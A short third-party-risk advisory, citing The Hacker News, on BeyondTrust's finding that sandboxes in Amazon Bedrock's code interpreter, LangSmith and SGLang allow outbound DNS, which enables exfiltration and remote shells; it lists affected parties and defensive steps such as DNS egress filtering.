AI Sandbox Flaws in Amazon Bedrock, LangSmith, and SGLang Enable Data Exfiltration and Remote Code Execution
What Happened – Researchers from BeyondTrust discovered that the sandbox mode of Amazon Bedrock’s Agent Core Code Interpreter, as well as LangSmith and SGLang runtimes, allow outbound DNS queries. An attacker can abuse these queries to exfiltrate data and obtain an interactive shell, effectively achieving remote code execution (RCE).
Why It Matters for TPRM –
- Cloud‑based AI services are increasingly embedded in third‑party applications, expanding the attack surface.
- DNS‑based exfiltration bypasses many traditional egress controls, exposing sensitive data to external actors.
- RCE in a shared AI execution environment can compromise downstream workloads and downstream customers.
Who Is Affected – SaaS providers, enterprise developers, and any organization that integrates Amazon Bedrock, LangSmith, or SGLang into their products or internal workflows.
Recommended Actions – Review contracts and security clauses for AI‑as‑a‑Service (AIaaS) providers, enforce strict egress filtering for DNS, request evidence of sandbox hardening, and consider alternative AI runtimes until patches are verified.
Technical Notes – The vulnerability stems from a mis‑configured sandbox that permits unrestricted outbound DNS traffic, enabling a covert channel for data exfiltration and interactive shell access. No specific CVE has been assigned yet; the issue is disclosed as a zero‑day exploit. Source: The Hacker News